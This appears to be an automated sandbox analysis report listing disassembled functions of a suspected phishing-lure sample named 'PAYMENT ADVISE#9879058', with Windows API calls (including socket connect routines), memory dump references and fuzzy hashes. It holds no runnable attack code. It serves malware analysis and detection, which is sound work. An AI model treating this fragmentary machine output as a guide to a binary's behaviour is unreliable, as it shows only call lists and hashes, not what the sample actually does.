                          • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                          • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                          Function 00447BAF Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00447C1B
                          • ScreenToClient.USER32(?,?), ref: 00447C39
                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                          • EndPaint.USER32(?,?), ref: 00447CD1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ClientPaintRectRectangleScreenViewportWindow
                          • String ID:
                          • API String ID: 659298297-0
                          • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                          • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                          • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                          • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                          Function 00447870 Relevance: 7.6, APIs: 5, Instructions: 94windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetCursorPos.USER32(?), ref: 004478A7
                          • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                          • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                          • GetCursorPos.USER32(?), ref: 00447935
                          • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CursorMenuPopupTrack$Proc
                          • String ID:
                          • API String ID: 1300944170-0
                          • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                          • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                          • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                          • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                          Function 00448837 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                          Download Yara Rule
                          APIs
                          • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                          • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                          • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                            • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                            • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                            • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                            • Part of subcall function 004413F0: SendMessageW.USER32(02F31B48,000000F1,00000000,00000000), ref: 004414C6
                            • Part of subcall function 004413F0: SendMessageW.USER32(02F31B48,000000F1,00000001,00000000), ref: 004414F1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Window$EnableMessageSend$LongShow
                          • String ID:
                          • API String ID: 142311417-0
                          • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                          • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                          • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                          • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                          Function 00449549 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 0044955A
                            • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                          • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                          • _wcslen.LIBCMT ref: 004495C1
                          • _wcslen.LIBCMT ref: 004495CE
                          • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend_wcslen$_memset_wcspbrk
                          • String ID:
                          • API String ID: 1843234404-0
                          • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                          • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                          • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                          • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                          Function 00455014 Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                          • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                          • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                          • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                          Function 00445719 Relevance: 7.6, APIs: 5, Instructions: 76windowCOMMON
                          Download Yara Rule
                          APIs
                          • IsWindowVisible.USER32(?), ref: 00445721
                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                          • _wcslen.LIBCMT ref: 004457A3
                          • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                          • String ID:
                          • API String ID: 3087257052-0
                          • Opcode ID: 453d8cf2d53bd446159bbb0baa073021fe1e74c256db72c881888fb31e2a567b
                          • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                          • Opcode Fuzzy Hash: 453d8cf2d53bd446159bbb0baa073021fe1e74c256db72c881888fb31e2a567b
                          • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                          Function 00459DCF Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                          Download Yara Rule
                          APIs
                          • IsWindow.USER32(00000000), ref: 00459DEF
                          • GetForegroundWindow.USER32 ref: 00459E07
                          • GetDC.USER32(00000000), ref: 00459E44
                          • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                          • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Window$ForegroundPixelRelease
                          • String ID:
                          • API String ID: 4156661090-0
                          • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                          • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                          • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                          • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                          Function 00464950 Relevance: 7.6, APIs: 5, Instructions: 68networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00464985
                          • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                          • connect.WSOCK32(00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649CD
                          • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                          • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 00464A07
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ErrorLast$closesocketconnectinet_addrsocket
                          • String ID:
                          • API String ID: 245547762-0
                          • Opcode ID: c11d93ef0e5925fc7b778e12926c76e847d2ba71e7f4531691fb5523561cfb0e
                          • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                          • Opcode Fuzzy Hash: c11d93ef0e5925fc7b778e12926c76e847d2ba71e7f4531691fb5523561cfb0e
                          • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                          Function 0044710F Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 00447151
                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                          • SelectObject.GDI32(?,00000000), ref: 004471A2
                          • BeginPath.GDI32(?), ref: 004471B7
                          • SelectObject.GDI32(?,00000000), ref: 004471DC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Object$Select$BeginCreateDeletePath
                          • String ID:
                          • API String ID: 2338827641-0
                          • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                          • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                          • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                          • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                          Function 0043770A Relevance: 7.6, APIs: 5, Instructions: 56sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                          • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                          • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CounterPerformanceQuerySleep
                          • String ID:
                          • API String ID: 2875609808-0
                          • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                          • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                          • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                          • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                          Function 0046FCC6 Relevance: 7.5, APIs: 5, Instructions: 49windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32 ref: 0046FD00
                          • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                          • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                          • DestroyIcon.USER32(?), ref: 0046FD58
                          • DestroyIcon.USER32(?), ref: 0046FD5F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$DestroyIcon
                          • String ID:
                          • API String ID: 3419509030-0
                          • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                          • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                          • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                          • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                          Function 004175A2 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 004175AE
                            • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                            • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                          • __amsg_exit.LIBCMT ref: 004175CE
                          • __lock.LIBCMT ref: 004175DE
                          • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                          • InterlockedIncrement.KERNEL32(02F32CF0), ref: 00417626
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                          • String ID:
                          • API String ID: 4271482742-0
                          • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                          • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                          • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                          • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                          Function 004555B8 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                          • DeleteObject.GDI32(?), ref: 0045564E
                          • DeleteObject.GDI32(?), ref: 0045565C
                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Destroy$DeleteObjectWindow$Icon
                          • String ID:
                          • API String ID: 4023252218-0
                          • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                          • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                          • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                          • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                          Function 0046032B Relevance: 7.5, APIs: 5, Instructions: 43windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00460342
                          • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                          • MessageBeep.USER32(00000000), ref: 0046036D
                          • KillTimer.USER32(?,0000040A), ref: 00460392
                          • EndDialog.USER32(?,00000001), ref: 004603AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                          • String ID:
                          • API String ID: 3741023627-0
                          • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                          • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                          • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                          • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                          Function 00455505 Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                          • DeleteObject.GDI32(?), ref: 0045564E
                          • DeleteObject.GDI32(?), ref: 0045565C
                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: DeleteDestroyObject$IconMessageSendWindow
                          • String ID:
                          • API String ID: 1489400265-0
                          • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                          • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                          • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                          • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                          Function 0045551F Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                          • DeleteObject.GDI32(?), ref: 0045564E
                          • DeleteObject.GDI32(?), ref: 0045565C
                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                          • String ID:
                          • API String ID: 1042038666-0
                          • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                          • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
